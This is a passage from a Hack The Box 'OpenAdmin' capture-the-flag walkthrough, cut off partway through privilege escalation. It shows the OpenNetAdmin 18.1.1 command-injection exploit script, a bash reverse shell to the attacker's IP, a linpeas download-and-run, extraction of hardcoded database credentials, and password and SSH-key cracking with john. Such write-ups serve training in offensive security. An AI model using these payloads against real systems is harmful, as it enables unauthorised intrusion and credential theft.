+ [ 10.10.14.13/23 ] [ /dev/pts/13 ] [~/HTB/OpenAdmin]
+ → apt install seclists ffuf
+
+ [ 10.10.14.13/23 ] [ /dev/pts/1 ] [~/HTB/OpenAdmin]
+ → ffuf -u http://10.10.10.171/FUZZ -w /usr/share/seclists/Discovery/Web-Content/common.txt -mc 200,204,301,302,307,401 -o ffuf.txt
+
+ /'___\ /'___\ /'___\
+ /\ \__/ /\ \__/ __ __ /\ \__/
+ \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
+ \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
+ \ \_\ \ \_\ \ \____/ \ \_\
+ \/_/ \/_/ \/___/ \/_/
+
+ v1.3.1 Kali Exclusive
+ ________________________________________________
+
+ :: Method : GET
+ :: URL : http://10.10.10.171/FUZZ
+ :: Wordlist : FUZZ: /usr/share/seclists/Discovery/Web-Content/common.txt
+ :: Output file : ffuf.txt
+ :: File format : json
+ :: Follow redirects : false
+ :: Calibration : false
+ :: Timeout : 10
+ :: Threads : 40
+ :: Matcher : Response status: 200,204,301,302,307,401
+ ________________________________________________
+
+ artwork [Status: 301, Size: 314, Words: 20, Lines: 10]
+ index.html [Status: 200, Size: 10918, Words: 3499, Lines: 376]
+ music [Status: 301, Size: 312, Words: 20, Lines: 10]
+ :: Progress: [4681/4681] :: Job [1/1] :: 978 req/sec :: Duration: [0:00:07] :: Errors: 0 ::
+
+
+
+Now from here we can scrape the results that got outputted in ffuf.txt using a python script:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/1 ] [~/HTB/OpenAdmin]
+ → cat ffuf.txt
+ {"commandline":"ffuf -u http://10.10.10.171/FUZZ -w /usr/share/seclists/Discovery/Web-Content/common.txt -mc 200,204,301,302,307,401 -o ffuf.txt","time":"2021-05-27T07:01:23+02:00","results":[{"input":{"FUZZ":"artwork"},"position":695,"status":301,"length":314,"words":20,"lines":10,"content-type":"text/html; charset=iso-8859-1","redirectlocation":"http://10.10.10.171/artwork/","resultfile":"","url":"http://10.10.10.171/artwork","host":"10.10.10.171"},{"input":{"FUZZ":"index.html"},"position":2176,"status":200,"length":10918,"words":3499,"lines":376,"content-type":"text/html","redirectlocation":"","resultfile":"","url":"http://10.10.10.171/index.md","host":"10.10.10.171"},{"input":{"FUZZ":"music"},"position":2747,"status":301,"length":312,"words":20,"lines":10,"content-type":"text/html; charset=iso-8859-1","redirectlocation":"http://10.10.10.171/music/","resultfile":"","url":"http://10.10.10.171/music","host":"10.10.10.171"}],"config":{"autocalibration":false,"autocalibration_strings":[],"colors":false,"cmdline":"ffuf -u http://10.10.10.171/FUZZ -w /usr/share/seclists/Discovery/Web-Content/common.txt -mc 200,204,301,302,307,401 -o 
ffuf.txt","configfile":"","postdata":"","delay":{"value":"0.00"},"dirsearch_compatibility":false,"extensions":[],"filters":{},"follow_redirects":false,"headers":{},"ignorebody":false,"ignore_wordlist_comments":false,"inputmode":"clusterbomb","cmd_inputnum":100,"inputproviders":[{"name":"wordlist","keyword":"FUZZ","value":"/usr/share/seclists/Discovery/Web-Content/common.txt"}],"inputshell":"","matchers":{"status":{"value":"200,204,301,302,307,401"}},"maxtime":0,"maxtime_job":0,"method":"GET","noninteractive":false,"outputdirectory":"","outputfile":"ffuf.txt","outputformat":"json","OutputCreateEmptyFile":false,"proxyurl":"","quiet":false,"rate":0,"recursion":false,"recursion_depth":0,"recursion_strategy":"default","replayproxyurl":"","stop_403":false,"stop_all":false,"stop_errors":false,"threads":40,"timeout":10,"url":"http://10.10.10.171/FUZZ","verbose":false}}%
+
+ [ 10.10.14.13/23 ] [ /dev/pts/1 ] [~/HTB/OpenAdmin]
+ → vim scraper.py
+
+
+
+ #!/usr/bin/python
+ import sys
+ import json
+ import requests
+ import argparse
+ from bs4 import BeautifulSoup
+
+ def results(file):
+ content=open(file,'r').readlines()
+ for line in content:
+ data=json.loads(line.strip())
+ urls=[]
+ for url in data['results']:
+ urls.append(url['url'])
+ return urls
+
+ def crawl(url):
+ r = requests.get(url)
+ soup = BeautifulSoup(r.text,'lxml')
+ links = soup.findAll('a',href=True)
+ for link in links:
+ link=link['href']
+ if link and link!='#':
+ print('[+] {} : {} '.format(url,link))
+
+ if __name__ == '__main__' :
+ parser =argparse.ArgumentParser()
+ parser.add_argument("file",help="ffuf results")
+ args = parser.parse_args()
+ urls=results(args.file)
+ for url in urls:
+ crawl(url)
+
+
+
+Now execute it and see the result:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/14 ] [~/HTB/OpenAdmin]
+ → python3 scraper.py
+ usage: scraper.py [-h] file
+ scraper.py: error: the following arguments are required: file
+
+ [ 10.10.14.13/23 ] [ /dev/pts/14 ] [~/HTB/OpenAdmin]
+ → python3 scraper.py ffuf.txt
+ [+] http://10.10.10.171/artwork : index.html
+ [+] http://10.10.10.171/artwork : index.html
+ [+] http://10.10.10.171/artwork : about.html
+ [+] http://10.10.10.171/artwork : services.html
+ [+] http://10.10.10.171/artwork : blog.html
+ [+] http://10.10.10.171/artwork : contact.html
+ [+] http://10.10.10.171/artwork : single.html
+ [+] http://10.10.10.171/artwork : single.html
+ [+] http://10.10.10.171/artwork : single.html
+ [+] http://10.10.10.171/artwork : single.html
+ [+] http://10.10.10.171/artwork : single.html
+ [+] http://10.10.10.171/artwork : single.html
+ [+] http://10.10.10.171/artwork : index.html
+ [+] http://10.10.10.171/artwork : https://colorlib.com
+ [+] http://10.10.10.171/index.md : /manual
+ [+] http://10.10.10.171/index.md : http://httpd.apache.org/docs/2.4/mod/mod_userdir.html
+ [+] http://10.10.10.171/index.md : https://bugs.launchpad.net/ubuntu/+source/apache2
+ [+] http://10.10.10.171/music : index.html
+
+ [+] http://10.10.10.171/music : ../ona
+
+ [+] http://10.10.10.171/music : index.html
+ [+] http://10.10.10.171/music : category.html
+ [+] http://10.10.10.171/music : playlist.html
+ [+] http://10.10.10.171/music : artist.html
+ [+] http://10.10.10.171/music : blog.html
+ [+] http://10.10.10.171/music : contact.html
+ [+] http://10.10.10.171/music : blog.html
+ [+] http://10.10.10.171/music : contact.html
+ [+] http://10.10.10.171/music : https://colorlib.com
+
+
+
+And so with this we find the ../ona path
+
+
+
+ona in this case refers to OpenNetAdmin, and we know that it is version 18.1.1, so let's see if there are any CVEs for this service:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/14 ] [~/HTB/OpenAdmin]
+ → searchsploit opennetadmin
+ ------------------------------------------------------------ ---------------------------------
+ Exploit Title | Path
+ ------------------------------------------------------------ ---------------------------------
+ OpenNetAdmin 13.03.01 - Remote Code Execution | php/webapps/26682.txt
+ OpenNetAdmin 18.1.1 - Command Injection Exploit (Metasploit)| php/webapps/47772.rb
+ OpenNetAdmin 18.1.1 - Remote Code Execution | php/webapps/47691.sh
+ ------------------------------------------------------------ ---------------------------------
+ Shellcodes: No Results
+
+
+And here you see that we have a few exploits to work with. We're going to take a look at the RCE one:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/14 ] [~/HTB/OpenAdmin]
+ → cp $(locate 47691.sh) .
+
+ [ 10.10.14.13/23 ] [ /dev/pts/14 ] [~/HTB/OpenAdmin]
+ → ls
+ 47691.sh ffuf.txt scraper.py
+
+ [ 10.10.14.13/23 ] [ /dev/pts/14 ] [~/HTB/OpenAdmin]
+ → vim 47691.sh
+
+ #!/bin/bash
+
+ URL="${1}"
+ while true;do
+ echo -n "$ "; read cmd
+ curl --silent -d "xajax=window_submit&xajaxr;=1574117726710&xajaxargs;[]=tooltips&xajaxargs;[]=ip%3D%3E;echo \"BEGIN\";${cmd};echo \"END\"&xajaxargs;[]=ping" "${URL}" | sed -n -e '/BEGIN/,/END/ p' | tail -n +2 | head -n -1
+ done
+
+
+
+Very simplistic exploit, it just needs the URL of the ona instance of the machine:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/1 ] [~/HTB/OpenAdmin]
+ → dos2unix 47691.sh
+ dos2unix: converting file 47691.sh to Unix format...
+
+ [ 10.10.14.13/23 ] [ /dev/pts/1 ] [~/HTB/OpenAdmin]
+ → ./47691.sh http://10.10.10.171/ona/
+ $ id
+ uid=33(www-data) gid=33(www-data) groups=33(www-data)
+ $ ls -lash
+ total 72K
+ 4.0K drwxrwxr-x 10 www-data www-data 4.0K Nov 22 2019 .
+ 4.0K drwxr-x--- 7 www-data www-data 4.0K Nov 21 2019 ..
+ 4.0K -rw-rw-r-- 1 www-data www-data 2.0K Jan 3 2018 .htaccess.example
+ 4.0K drwxrwxr-x 2 www-data www-data 4.0K Jan 3 2018 config
+ 4.0K -rw-rw-r-- 1 www-data www-data 2.0K Jan 3 2018 config_dnld.php
+ 8.0K -rw-rw-r-- 1 www-data www-data 4.1K Jan 3 2018 dcm.php
+ 4.0K drwxrwxr-x 3 www-data www-data 4.0K Jan 3 2018 images
+ 4.0K drwxrwxr-x 9 www-data www-data 4.0K Jan 3 2018 include
+ 4.0K -rw-rw-r-- 1 www-data www-data 2.0K Jan 3 2018 index.php
+ 4.0K drwxrwxr-x 5 www-data www-data 4.0K Jan 3 2018 local
+ 8.0K -rw-rw-r-- 1 www-data www-data 4.5K Jan 3 2018 login.php
+ 4.0K -rw-rw-r-- 1 www-data www-data 1.1K Jan 3 2018 logout.php
+ 4.0K drwxrwxr-x 3 www-data www-data 4.0K Jan 3 2018 modules
+ 4.0K drwxrwxr-x 3 www-data www-data 4.0K Jan 3 2018 plugins
+ 4.0K drwxrwxr-x 2 www-data www-data 4.0K Jan 3 2018 winc
+ 4.0K drwxrwxr-x 3 www-data www-data 4.0K Jan 3 2018 workspace_plugins
+
+
+And there we have command execution as www-data! However the more we test this, the more we see that we are very limited with our shell (unable to access python3, bash and such) so let's manually push a bash shell:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/14 ] [~/HTB/OpenAdmin]
+ → curl -s -d "xajax=window_submit&xajaxr;=1574117726710&xajaxargs;[]=tooltips&xajaxargs;[]=ip%3D%3E;bash -c 'bash -i >%26 /dev/tcp/10.10.14.13/4443 0>%261'&xajaxargs;[]=ping" http://10.10.10.171/ona/
+
+ [ 10.10.14.13/23 ] [ /dev/pts/1 ] [~/HTB/OpenAdmin]
+ → nc -lvnp 4443
+ listening on [any] 4443 ...
+ connect to [10.10.14.13] from (UNKNOWN) [10.10.10.171] 43106
+ bash: cannot set terminal process group (1077): Inappropriate ioctl for device
+ bash: no job control in this shell
+ www-data@openadmin:/opt/ona/www$ id
+ id
+ uid=33(www-data) gid=33(www-data) groups=33(www-data)
+
+
+
+Now let's upgrade our shell to a fully interactive TTY:
+
+
+ www-data@openadmin:/opt/ona/www$ which python python3
+ which python python3
+ /usr/bin/python3
+
+ www-data@openadmin:/opt/ona/www$ python3 -c 'import pty;pty.spawn("/bin/bash")'
+ $ python3 -c 'import pty;pty.spawn("/bin/bash")'
+
+ www-data@openadmin:/opt/ona/www$ ^Z
+ [1] + 3470018 suspended nc -lvnp 4443
+
+ [ 10.10.14.13/23 ] [ /dev/pts/1 ] [~/HTB/OpenAdmin]
+ → stty raw -echo ; fg
+ [1] + 3470018 continued nc -lvnp 4443
+ www-data@openadmin:/opt/ona/www$ export TERM=screen-256color
+ www-data@openadmin:/opt/ona/www$ export SHELL=bash
+ www-data@openadmin:/opt/ona/www$ stty rows 40 columns 125
+ www-data@openadmin:/opt/ona/www$ reset
+
+
+Let's see which users we can privesc to:
+
+
+ www-data@openadmin:/opt/ona/www$ cat /etc/passwd | grep bash
+ root:x:0:0:root:/root:/bin/bash
+ jimmy:x:1000:1000:jimmy:/home/jimmy:/bin/bash
+ joanna:x:1001:1001:,,,:/home/joanna:/bin/bash
+ www-data@openadmin:/opt/ona/www$ ls -lashR /home
+ /home:
+ total 16K
+ 4.0K drwxr-xr-x 4 root root 4.0K Nov 22 2019 .
+ 4.0K drwxr-xr-x 24 root root 4.0K Nov 21 2019 ..
+ 4.0K drwxr-x--- 5 jimmy jimmy 4.0K Nov 22 2019 jimmy
+ 4.0K drwxr-x--- 6 joanna joanna 4.0K Nov 28 2019 joanna
+ ls: cannot open directory '/home/jimmy': Permission denied
+ ls: cannot open directory '/home/joanna': Permission denied
+
+
+
+To enumerate this box automatically we can use linpeas.sh:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/1 ] [~/HTB/OpenAdmin]
+ → locate linpeas.sh
+ /home/nothing/HTB/Postman/linpeas.sh
+ /home/nothing/HTB/Traverxec/linpeas.sh
+ /home/nothing/Tools/privilege-escalation-awesome-scripts-suite/linPEAS/linpeas.sh
+
+ [ 10.10.14.13/23 ] [ /dev/pts/1 ] [~/HTB/OpenAdmin]
+ → cp /home/nothing/Tools/privilege-escalation-awesome-scripts-suite/linPEAS/linpeas.sh .
+
+ [ 10.10.14.13/23 ] [ /dev/pts/1 ] [~/HTB/OpenAdmin]
+ → python3 -m http.server 9090
+ Serving HTTP on 0.0.0.0 port 9090 (http://0.0.0.0:9090/) ...
+
+ www-data@openadmin:/opt/ona/www$ which wget curl
+ /usr/bin/wget
+ /usr/bin/curl
+ www-data@openadmin:/opt/ona/www$ wget http://10.10.14.13:9090/linpeas.sh -O /tmp/peas.sh
+ --2021-05-27 06:39:01-- http://10.10.14.13:9090/linpeas.sh
+ Connecting to 10.10.14.13:9090... connected.
+ HTTP request sent, awaiting response... 200 OK
+ Length: 341863 (334K) [text/x-sh]
+ Saving to: '/tmp/peas.sh'
+
+ /tmp/peas.sh 100%[====================================================>] 333.85K 695KB/s in 0.5s
+
+ 2021-05-27 06:39:02 (695 KB/s) - '/tmp/peas.sh' saved [341863/341863]
+
+ www-data@openadmin:/opt/ona/www$ chmod +x /tmp/peas.sh
+ www-data@openadmin:/opt/ona/www$ /tmp/peas.sh
+
+
+
+` 
+
+Linpeas gives alot of output, one thing that stands out is the following:
+
+
+
+OpenNetAdmin has a database settings php file in **/var/www/html/ona/local/config/database_settings.inc.php**
+
+
+ www-data@openadmin:/opt/ona/www$ cd /var/www/html/ona/local/config
+ www-data@openadmin:/var/www/html/ona/local/config$ ls -lash
+ total 16K
+ 4.0K drwxrwxr-x 2 www-data www-data 4.0K Nov 21 2019 .
+ 4.0K drwxrwxr-x 5 www-data www-data 4.0K Jan 3 2018 ..
+ 4.0K -rw-r--r-- 1 www-data www-data 426 Nov 21 2019 database_settings.inc.php
+ 4.0K -rw-rw-r-- 1 www-data www-data 1.2K Jan 3 2018 motd.txt.example
+ 0 -rw-r--r-- 1 www-data www-data 0 Nov 21 2019 run_installer
+ www-data@openadmin:/var/www/html/ona/local/config$ vim database_settings.inc.php
+
+
+
+
+And here we see some hardcoded credentials:
+
+
+ <****?php
+
+ $ona_contexts=array (
+ 'DEFAULT' =>
+ array (
+ 'databases' =>
+ array (
+ 0 =>
+ array (
+ 'db_type' => 'mysqli',
+ 'db_host' => 'localhost',
+ 'db_login' => 'ona_sys',
+ 'db_passwd' => 'n1nj4W4rri0R!',
+ 'db_database' => 'ona_default',
+ 'db_debug' => false,
+ ),
+ ),
+ 'description' => 'Default data context',
+ 'context_color' => '#D3DBFF',
+ ),
+ );
+
+ ?****>
+
+And as it turns out, those were jimmy's credentials!
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/13 ] [~/HTB/OpenAdmin]
+ → ssh jimmy@10.10.10.171
+ The authenticity of host '10.10.10.171 (10.10.10.171)' can't be established.
+ ECDSA key fingerprint is SHA256:loIRDdkV6Zb9r8OMF3jSDMW3MnV5lHgn4wIRq+vmBJY.
+ Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
+ Warning: Permanently added '10.10.10.171' (ECDSA) to the list of known hosts.
+ jimmy@10.10.10.171's password:
+ Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-70-generic x86_64)
+
+ * Documentation: https://help.ubuntu.com
+ * Management: https://landscape.canonical.com
+ * Support: https://ubuntu.com/advantage
+
+ System information as of Thu May 27 07:04:20 UTC 2021
+
+ System load: 0.0 Processes: 121
+ Usage of /: 49.3% of 7.81GB Users logged in: 0
+ Memory usage: 29% IP address for ens160: 10.10.10.171
+ Swap usage: 0%
+
+
+ * Canonical Livepatch is available for installation.
+ - Reduce system reboots and improve kernel security. Activate at:
+ https://ubuntu.com/livepatch
+
+ 41 packages can be updated.
+ 12 updates are security updates.
+
+
+ Last login: Thu Jan 2 20:50:03 2020 from 10.10.14.3
+ jimmy@openadmin:~$ id
+ uid=1000(jimmy) gid=1000(jimmy) groups=1000(jimmy),1002(internal)
+ jimmy@openadmin:~$ ls
+ jimmy@openadmin:~$ ls -lash
+ total 32K
+ 4.0K drwxr-x--- 5 jimmy jimmy 4.0K Nov 22 2019 .
+ 4.0K drwxr-xr-x 4 root root 4.0K Nov 22 2019 ..
+ 0 lrwxrwxrwx 1 jimmy jimmy 9 Nov 21 2019 .bash_history -> /dev/null
+ 4.0K -rw-r--r-- 1 jimmy jimmy 220 Apr 4 2018 .bash_logout
+ 4.0K -rw-r--r-- 1 jimmy jimmy 3.7K Apr 4 2018 .bashrc
+ 4.0K drwx------ 2 jimmy jimmy 4.0K Nov 21 2019 .cache
+ 4.0K drwx------ 3 jimmy jimmy 4.0K Nov 21 2019 .gnupg
+ 4.0K drwxrwxr-x 3 jimmy jimmy 4.0K Nov 22 2019 .local
+ 4.0K -rw-r--r-- 1 jimmy jimmy 807 Apr 4 2018 .profile
+
+
+So now we can access the **/var/www/internal** directory:
+
+
+ jimmy@openadmin:/var/www/internal$ ls -lash
+ total 20K
+ 4.0K drwxrwx--- 2 jimmy internal 4.0K Nov 23 2019 .
+ 4.0K drwxr-xr-x 4 root root 4.0K Nov 22 2019 ..
+ 4.0K -rwxrwxr-x 1 jimmy internal 3.2K Nov 22 2019 index.php
+ 4.0K -rwxrwxr-x 1 jimmy internal 185 Nov 23 2019 logout.php
+ 4.0K -rwxrwxr-x 1 jimmy internal 339 Nov 23 2019 main.php
+ jimmy@openadmin:/var/www/internal$ cat /etc/apache2/sites-enabled/
+ internal.conf openadmin.conf
+ jimmy@openadmin:/var/www/internal$ cat /etc/apache2/sites-enabled/internal.conf
+ Listen 127.0.0.1:52846
+
+
+ ServerName internal.openadmin.htb
+ DocumentRoot /var/www/internal
+
+
+ AssignUserID joanna joanna
+
+
+ ErrorLog ${APACHE_LOG_DIR}/error.log
+ CustomLog ${APACHE_LOG_DIR}/access.log combined
+
+
+
+
+The /var/www/internal/ directory is being used by the apache2 site whose configuration is at /etc/apache2/sites-enabled/internal.conf And it seems to be running on the machine's localhost port **52846** , No need to view the page itself because we have access to it's php sourcecode:
+
+
+ jimmy@openadmin:/var/www/internal$ cat index.php | grep password
+ .form-signin input[type="password"] {
+ if (isset($_POST['login']) && !empty($_POST['username']) && !empty($_POST['password'])) {
+ if ($_POST['username'] == 'jimmy' && hash('sha512',$_POST['password']) == '00e302ccdcf1c60b8ad50ea50cf72b939705f49f40f0dc658801b4680b7d758eebdc2e9f9ba8ba3ef8a8bb9a796d34ba2e856838ee9bdde852b8ec3b3a0523b1') {
+ $msg = 'Wrong username or password.';
+
+
+So here we get a hashed password, so let's crack it with john:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/1 ] [~/HTB/OpenAdmin]
+ → cat pass.hashed.txt
+ 00e302ccdcf1c60b8ad50ea50cf72b939705f49f40f0dc658801b4680b7d758eebdc2e9f9ba8ba3ef8a8bb9a796d34ba2e856838ee9bdde852b8ec3b3a0523b1
+
+ [ 10.10.14.13/23 ] [ /dev/pts/1 ] [~/HTB/OpenAdmin]
+ → hash-identifier
+ #########################################################################
+ # __ __ __ ______ _____ #
+ # /\ \/\ \ /\ \ /\__ _\ /\ _ `\ #
+ # \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ #
+ # \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ #
+ # \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ #
+ # \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ #
+ # \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v1.2 #
+ # By Zion3R #
+ # www.Blackploit.com #
+ # Root@Blackploit.com #
+ #########################################################################
+ --------------------------------------------------
+ HASH: 00e302ccdcf1c60b8ad50ea50cf72b939705f49f40f0dc658801b4680b7d758eebdc2e9f9ba8ba3ef8a8bb9a796d34ba2e856838ee9bdde852b8ec3b3a0523b1
+
+ Possible Hashs:
+ [+] SHA-512
+ [+] Whirlpool
+
+ Least Possible Hashs:
+ [+] SHA-512(HMAC)
+ [+] Whirlpool(HMAC)
+ --------------------------------------------------
+
+
+
+We get hinted that this is a SHA512 hash, so let's crack it using john and rockyou.txt
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/1 ] [~/HTB/OpenAdmin]
+ → john pass.hashed.txt --format=Raw-SHA512 --wordlist=/usr/share/wordlists/rockyou.txt --rules=Jumbo
+ Using default input encoding: UTF-8
+ Loaded 1 password hash (Raw-SHA512 [SHA512 256/256 AVX2 4x])
+ Warning: poor OpenMP scalability for this hash type, consider --fork=4
+ Will run 4 OpenMP threads
+ Press 'q' or Ctrl-C to abort, almost any other key for status
+
+ Revealed (?)
+
+ 1g 0:00:00:02 DONE (2021-05-27 09:06) 0.4504g/s 6963Kp/s 6963Kc/s 6963KC/s Rey428..Reesenme
+ Use the "--show" option to display all of the cracked passwords reliably
+ Session completed
+
+
+
+And we get the password 'Revealed'! So let's create a ssh tunnel to the box to view the internal website:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/1 ] [~/HTB/OpenAdmin]
+ → ssh jimmy@10.10.10.171
+ jimmy@10.10.10.171's password: n1nj4W4rri0R!
+ Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-70-generic x86_64)
+
+ * Documentation: https://help.ubuntu.com
+ * Management: https://landscape.canonical.com
+ * Support: https://ubuntu.com/advantage
+
+ System information as of Thu May 27 08:16:54 UTC 2021
+
+ System load: 0.0 Processes: 118
+ Usage of /: 49.3% of 7.81GB Users logged in: 1
+ Memory usage: 29% IP address for ens160: 10.10.10.171
+ Swap usage: 0%
+
+
+ * Canonical Livepatch is available for installation.
+ - Reduce system reboots and improve kernel security. Activate at:
+ https://ubuntu.com/livepatch
+
+ 41 packages can be updated.
+ 12 updates are security updates.
+
+ Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
+
+
+ Last login: Thu May 27 07:04:21 2021 from 10.10.14.13
+ jimmy@openadmin:~$
+
+
+Here you could create a SSH tunnel to get to the internal website like so:
+
+
+ jimmy@openadmin:~$ ssh -R 1337:127.0.0.1:52946 root@10.10.14.13
+
+
+
+However there's a simpler method:
+
+
+ jimmy@openadmin:/var/www/internal$ curl localhost:52846/main.php
+
+
+
+ -----BEGIN RSA PRIVATE KEY-----
+ Proc-Type: 4,ENCRYPTED
+ DEK-Info: AES-128-CBC,2AF25344B8391A25A9B318F3FD767D6D
+
+ kG0UYIcGyaxupjQqaS2e1HqbhwRLlNctW2HfJeaKUjWZH4usiD9AtTnIKVUOpZN8
+ ad/StMWJ+MkQ5MnAMJglQeUbRxcBP6++Hh251jMcg8ygYcx1UMD03ZjaRuwcf0YO
+ ShNbbx8Euvr2agjbF+ytimDyWhoJXU+UpTD58L+SIsZzal9U8f+Txhgq9K2KQHBE
+ 6xaubNKhDJKs/6YJVEHtYyFbYSbtYt4lsoAyM8w+pTPVa3LRWnGykVR5g79b7lsJ
+ ZnEPK07fJk8JCdb0wPnLNy9LsyNxXRfV3tX4MRcjOXYZnG2Gv8KEIeIXzNiD5/Du
+ y8byJ/3I3/EsqHphIHgD3UfvHy9naXc/nLUup7s0+WAZ4AUx/MJnJV2nN8o69JyI
+ 9z7V9E4q/aKCh/xpJmYLj7AmdVd4DlO0ByVdy0SJkRXFaAiSVNQJY8hRHzSS7+k4
+ piC96HnJU+Z8+1XbvzR93Wd3klRMO7EesIQ5KKNNU8PpT+0lv/dEVEppvIDE/8h/
+ /U1cPvX9Aci0EUys3naB6pVW8i/IY9B6Dx6W4JnnSUFsyhR63WNusk9QgvkiTikH
+ 40ZNca5xHPij8hvUR2v5jGM/8bvr/7QtJFRCmMkYp7FMUB0sQ1NLhCjTTVAFN/AZ
+ fnWkJ5u+To0qzuPBWGpZsoZx5AbA4Xi00pqqekeLAli95mKKPecjUgpm+wsx8epb
+ 9FtpP4aNR8LYlpKSDiiYzNiXEMQiJ9MSk9na10B5FFPsjr+yYEfMylPgogDpES80
+ X1VZ+N7S8ZP+7djB22vQ+/pUQap3PdXEpg3v6S4bfXkYKvFkcocqs8IivdK1+UFg
+ S33lgrCM4/ZjXYP2bpuE5v6dPq+hZvnmKkzcmT1C7YwK1XEyBan8flvIey/ur/4F
+ FnonsEl16TZvolSt9RH/19B7wfUHXXCyp9sG8iJGklZvteiJDG45A4eHhz8hxSzh
+ Th5w5guPynFv610HJ6wcNVz2MyJsmTyi8WuVxZs8wxrH9kEzXYD/GtPmcviGCexa
+ RTKYbgVn4WkJQYncyC0R1Gv3O8bEigX4SYKqIitMDnixjM6xU0URbnT1+8VdQH7Z
+ uhJVn1fzdRKZhWWlT+d+oqIiSrvd6nWhttoJrjrAQ7YWGAm2MBdGA/MxlYJ9FNDr
+ 1kxuSODQNGtGnWZPieLvDkwotqZKzdOg7fimGRWiRv6yXo5ps3EJFuSU1fSCv2q2
+ XGdfc8ObLC7s3KZwkYjG82tjMZU+P5PifJh6N0PqpxUCxDqAfY+RzcTcM/SLhS79
+ yPzCZH8uWIrjaNaZmDSPC/z+bWWJKuu4Y1GCXCqkWvwuaGmYeEnXDOxGupUchkrM
+ +4R21WQ+eSaULd2PDzLClmYrplnpmbD7C7/ee6KDTl7JMdV25DM9a16JYOneRtMt
+ qlNgzj0Na4ZNMyRAHEl1SF8a72umGO2xLWebDoYf5VSSSZYtCNJdwt3lF7I8+adt
+ z0glMMmjR2L5c2HdlTUt5MgiY8+qkHlsL6M91c4diJoEXVh+8YpblAoogOHHBlQe
+ K1I1cqiDbVE/bmiERK+G4rqa0t7VQN6t2VWetWrGb+Ahw/iMKhpITWLWApA3k9EN
+ -----END RSA PRIVATE KEY-----
+
+
+### Don't forget your "ninja" password
+
+Click here to logout [Session](logout.php)
+
+And we have an encrypted ssh key! so let's crack it:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/16 ] [~/HTB/OpenAdmin]
+ → vim id_rsa
+
+ [ 10.10.14.13/23 ] [ /dev/pts/16 ] [~/HTB/OpenAdmin]
+ → file id_rsa
+ id_rsa: PEM RSA private key
+
+ [ 10.10.14.13/23 ] [ /dev/pts/16 ] [~/HTB/OpenAdmin]
+ → locate ssh2john
+ /usr/share/john/ssh2john.py
+
+ [ 10.10.14.13/23 ] [ /dev/pts/16 ] [~/HTB/OpenAdmin]
+ → /usr/share/john/ssh2john.py id_rsa > id_rsa.hash
+
+ [ 10.10.14.13/23 ] [ /dev/pts/16 ] [~/HTB/OpenAdmin]
+ → john id_rsa.hash -w=/usr/share/wordlists/rockyou.txt
+ Using default input encoding: UTF-8
+ Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
+ Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
+ Cost 2 (iteration count) is 1 for all loaded hashes
+ Will run 4 OpenMP threads
+ Note: This format may emit false positives, so it will keep trying even after
+ finding a possible candidate.
+ Press 'q' or Ctrl-C to abort, almost any other key for status
+ bloodninjas (id_rsa)
+ Warning: Only 2 candidates left, minimum 4 needed for performance.
+ 1g 0:00:00:02 DONE (2021-05-27 10:16) 0.3496g/s 5014Kp/s 5014Kc/s 5014KC/sa6_123..*7¡Vamos!
+ Session completed
+
+ [ 10.10.14.13/23 ] [ /dev/pts/16 ] [~/HTB/OpenAdmin]
+ → chmod 600 id_rsa
+
+ [ 10.10.14.13/23 ] [ /dev/pts/16 ] [~/HTB/OpenAdmin]
+ → ssh joanna@10.10.10.171 -i id_rsa
+ Enter passphrase for key 'id_rsa':
+ Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-70-generic x86_64)
+
+ * Documentation: https://help.ubuntu.com
+ * Management: https://landscape.canonical.com
+ * Support: https://ubuntu.com/advantage
+
+ System information as of Thu May 27 08:24:40 UTC 2021
+
+ System load: 0.0 Processes: 123
+ Usage of /: 49.6% of 7.81GB Users logged in: 1
+ Memory usage: 29% IP address for ens160: 10.10.10.171
+ Swap usage: 0%
+
+
+ * Canonical Livepatch is available for installation.
+ - Reduce system reboots and improve kernel security. Activate at:
+ https://ubuntu.com/livepatch
+
+ 41 packages can be updated.
+ 12 updates are security updates.
+
+ Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
+
+
+ Last login: Thu Jan 2 21:12:40 2020 from 10.10.14.3
+ joanna@openadmin:~$ id
+ uid=1001(joanna) gid=1001(joanna) groups=1001(joanna),1002(internal)
+ joanna@openadmin:~$ ls
+ user.txt
+ joanna@openadmin:~$ cat user.txt
+ c9XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+
+And that's it! We managed to get the user flag.
+
+## **Part 3 : Getting Root Access**
+
+Now in order to privesc to the root user, we run linpeas again:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/12 ] [~/HTB/OpenAdmin]
+ → ls -lash linpeas.sh
+ 336K -rwxr-xr-x 1 nothing nothing 334K May 27 08:13 linpeas.sh
+
+ [ 10.10.14.13/23 ] [ /dev/pts/12 ] [~/HTB/OpenAdmin]
+ → python3 -m http.server 9090
+
+ joanna@openadmin:~$ wget http://10.10.14.13:9090/linpeas.sh
